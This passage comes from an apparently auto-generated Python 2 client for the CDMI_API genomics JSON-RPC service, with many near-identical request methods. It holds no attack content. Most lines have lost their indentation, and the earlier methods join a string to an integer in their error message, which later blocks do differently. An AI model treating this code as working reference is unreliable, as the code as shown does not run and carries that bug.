raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_literature(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_literature',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_protein_families(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_protein_families',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_roles(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_roles',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_subsystems(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_subsystems',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_co_occurring_fids(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_co_occurring_fids',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_locations(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_locations',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def locations_to_fids(self, region_of_dna_strings):
arg_hash = {'method': 'CDMI_API.locations_to_fids',
'params': [region_of_dna_strings],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def alleles_to_bp_locs(self, alleles):
arg_hash = {'method': 'CDMI_API.alleles_to_bp_locs',
'params': [alleles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def region_to_fids(self, region_of_dna):
arg_hash = {'method': 'CDMI_API.region_to_fids',
'params': [region_of_dna],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def region_to_alleles(self, region_of_dna):
arg_hash = {'method': 'CDMI_API.region_to_alleles',
'params': [region_of_dna],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def alleles_to_traits(self, alleles):
arg_hash = {'method': 'CDMI_API.alleles_to_traits',
'params': [alleles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def traits_to_alleles(self, traits):
arg_hash = {'method': 'CDMI_API.traits_to_alleles',
'params': [traits],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def ous_with_trait(self, genome, trait, measurement_type, min_value, max_value):
arg_hash = {'method': 'CDMI_API.ous_with_trait',
'params': [genome, trait, measurement_type, min_value, max_value],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def locations_to_dna_sequences(self, locations):
arg_hash = {'method': 'CDMI_API.locations_to_dna_sequences',
'params': [locations],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_fids(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_fids',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_protein_families(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_protein_families',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_literature(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_literature',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_functions(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_functions',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def proteins_to_roles(self, proteins):
arg_hash = {'method': 'CDMI_API.proteins_to_roles',
'params': [proteins],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_proteins(self, roles):
arg_hash = {'method': 'CDMI_API.roles_to_proteins',
'params': [roles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_subsystems(self, roles):
arg_hash = {'method': 'CDMI_API.roles_to_subsystems',
'params': [roles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def roles_to_protein_families(self, roles):
arg_hash = {'method': 'CDMI_API.roles_to_protein_families',
'params': [roles],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def fids_to_coexpressed_fids(self, fids):
arg_hash = {'method': 'CDMI_API.fids_to_coexpressed_fids',
'params': [fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def protein_families_to_fids(self, protein_families):
arg_hash = {'method': 'CDMI_API.protein_families_to_fids',
'params': [protein_families],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def protein_families_to_proteins(self, protein_families):
arg_hash = {'method': 'CDMI_API.protein_families_to_proteins',
'params': [protein_families],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def protein_families_to_functions(self, protein_families):
arg_hash = {'method': 'CDMI_API.protein_families_to_functions',
'params': [protein_families],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def protein_families_to_co_occurring_families(self, protein_families):
arg_hash = {'method': 'CDMI_API.protein_families_to_co_occurring_families',
'params': [protein_families],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def co_occurrence_evidence(self, pairs_of_fids):
arg_hash = {'method': 'CDMI_API.co_occurrence_evidence',
'params': [pairs_of_fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def contigs_to_sequences(self, contigs):
arg_hash = {'method': 'CDMI_API.contigs_to_sequences',
'params': [contigs],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def contigs_to_lengths(self, contigs):
arg_hash = {'method': 'CDMI_API.contigs_to_lengths',
'params': [contigs],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def contigs_to_md5s(self, contigs):
arg_hash = {'method': 'CDMI_API.contigs_to_md5s',
'params': [contigs],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def md5s_to_genomes(self, md5s):
arg_hash = {'method': 'CDMI_API.md5s_to_genomes',
'params': [md5s],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_md5s(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_md5s',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_contigs(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_contigs',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_fids(self, genomes, types_of_fids):
arg_hash = {'method': 'CDMI_API.genomes_to_fids',
'params': [genomes, types_of_fids],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def genomes_to_taxonomies(self, genomes):
arg_hash = {'method': 'CDMI_API.genomes_to_taxonomies',
'params': [genomes],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
        if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
